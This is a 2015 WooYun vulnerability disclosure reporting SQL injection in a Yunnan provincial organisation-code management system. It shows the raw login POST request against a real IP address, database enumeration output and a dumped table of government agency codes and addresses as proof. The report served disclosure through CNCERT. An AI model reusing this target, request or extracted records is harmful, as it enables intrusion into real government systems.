当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090753

漏洞标题:某省组织结构代码管理系统存在sql注入

相关厂商:cncert国家互联网应急中心

漏洞作者: 糖剩七颗

提交时间:2015-01-09 16:20

修复时间:2015-02-23 16:22

公开时间:2015-02-23 16:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-09: 细节已通知厂商并且等待厂商处理中
2015-01-14: 厂商已经确认,细节仅向厂商公开
2015-01-24: 细节向核心白帽子及相关领域专家公开
2015-02-03: 细节向普通白帽子公开
2015-02-13: 细节向实习白帽子公开
2015-02-23: 细节向公众公开

简要描述:

sql注入

详细说明:

POST /Login.aspx?ReturnUrl=%2fDefault.aspx HTTP/1.1
Host: 222.172.223.78:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://222.172.223.78:8080/Login.aspx?ReturnUrl=%2fDefault.aspx
Cookie: ASP.NET_SessionId=iaiwjnr5ubor2k34nuazpfac; SF_FIRST_ACCESS_SIGNPAGE=no; sangfor_session_hash=0
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 319
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE2NTc0ODQxODUPZBYCAgMPZBYCAgsPDxYCHgRUZXh0BRjnlKjmiLflkI3miJblr4bnoIHplJnor69kZGSB41dg%2FqjwQVEjTUDkyUO04oPwJA%3D%3D&__EVENTVALIDATION=%2FwEWBALwkeTlDwLdwYm6CQLq85jtCQKC3IeGDGELjOFqEBa9JDcPt9nCvOM4B%2BoW&tbxUser=admin&tbxPassword=admin&btnLogin=%E7%99%BB%E5%BD%95


1.jpg


漏洞证明:

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
available databases [19]:
[*] bsdata
[*] codescan
[*] distribution
[*] master
[*] model
[*] msdb
[*] Northwind
[*] outdatabase
[*] pubs
[*] siits
[*] sjqz
[*] sjqz.Lost
[*] swbf
[*] tempdb
[*] thams
[*] thams090706
[*] webcode
[*] webcodecheck
[*] weboa


eb server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
Database: webcode
Table: jgdm
[23 entries]
+--------------------+-----------+-------------------------+------------------------------------+--------------------+
| bzrq | jgdm | jgdz | jgmc | njrq |
+--------------------+-----------+-------------------------+------------------------------------+--------------------+
| 03 22 2012 12:00AM | 015100012 | 昆明市西山区滇池路166号 | 云南省人民代表大会常务委员会 | 03 26 2014 12:00AM |
| 08 6 2012 12:00AM | 015100020 | 云南省昆明市西山区广福路2号 | 中国人民政治协商会议云南省委员会 | 04 3 2014 10:45AM |
| 04 23 2013 12:00AM | 015100055 | 云南省昆明市西山区广福路8号 | 中国共产党云南省委员会办公厅 | 03 13 2014 12:00AM |
| 10 9 2011 12:00AM | 015100063 | 昆明市广福路8号 | 中国共产党云南省委员会组织部 | 07 28 2014 3:33PM |
| 04 9 2012 12:00AM | 015100071 | 昆明市广福路8号 | 中国共产党云南省委员会宣传部 | 12 23 2014 2:42PM |
| 12 30 2013 12:00AM | 01510008X | 云南省昆明市西山区广福路8号 | 中国共产党云南省委员会统一战线工作部 | 06 19 2012 9:54AM |
| 06 27 2013 12:00AM | 015100098 | 云南省昆明市广福路8号 | 中国共产党云南省委员会政法委员会 | 12 10 2014 12:00AM |
| 01 2 2014 12:00AM | 015100100 | 云南省昆明市西山区广福路8号 | 中国共产党云南省委员会政策研究室 | NULL |
| 10 16 2012 12:00AM | 015100127 | 云南省昆明市西山区金广路136号 | 中国共产党云南省委员会台湾工作办公室(云南省人民政府台湾事务办公室) | 11 27 2014 12:00AM |
| 11 21 2012 12:00AM | 015100135 | 云南省昆明市西山区广福路8号 | 中国共产党云南省纪律检查委员会 | NULL |
| 03 14 2012 12:00AM | 01510016X | 云南省昆明市西山区西昌路249号(省委2号院) | 中国共产党云南省委员会老干部局 | 05 8 2014 12:00AM |
| 02 21 2013 12:00AM | 015100194 | 云南省昆明市五华区华山南路78号 | 云南省人民政府办公厅 | 03 24 2014 12:00AM |
| 03 26 2013 12:00AM | 015100207 | 云南省昆明市盘龙区东风东路84号 | 云南省发展和改革委员会 | 12 22 2014 12:00AM |
| 08 8 2013 12:00AM | 015100215 | 昆明市永安路37号 | 云南省工业和信息化委员会 | 05 4 2014 12:00AM |
| 09 13 2012 12:00AM | 015100231 | 云南省昆明市五华区学府路2号 | 云南省教育厅 | 04 8 2014 12:00AM |
| 08 23 2012 12:00AM | 01510024X | 云南省昆明市北京路542号 | 云南省科学技术厅 | 12 29 2014 12:00AM |
| 06 5 2013 12:00AM | 015100258 | 昆明市环城西路170号 | 云南省民族事务委员会 | 06 23 2014 12:00AM |
| 12 8 2011 12:00AM | 015100266 | 昆明市官渡区国贸路85号政通大厦 | 云南省人口和计划生育委员会 | 03 18 2014 10:29AM |
| 03 19 2014 12:00AM | 015100274 | 昆明市东风东路99号 | 云南省体育局 | 12 7 2012 9:36AM |
| 07 30 2012 12:00AM | 015100282 | 昆明市大观路230号 | 云南省人民政府外事办公室 | 01 23 2014 4:16PM |
| 03 4 2013 12:00AM | 015100311 | 云南省昆明市西昌路26号 | 云南省司法厅 | 12 19 2014 12:00AM |
| 07 3 2014 12:00AM | 01510032X | 昆明市五华山 | 云南省财政厅 | NULL |
| 01 10 2014 12:00AM | 015100338 | 昆明市白云路538号 | <blank> | <blank> |
+--------------------+-----------+-------------------------+------------------------------------+--------------------+


修复方案:

你懂得

版权声明:转载请注明来源 糖剩七颗@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-01-14 13:52

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给云南分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论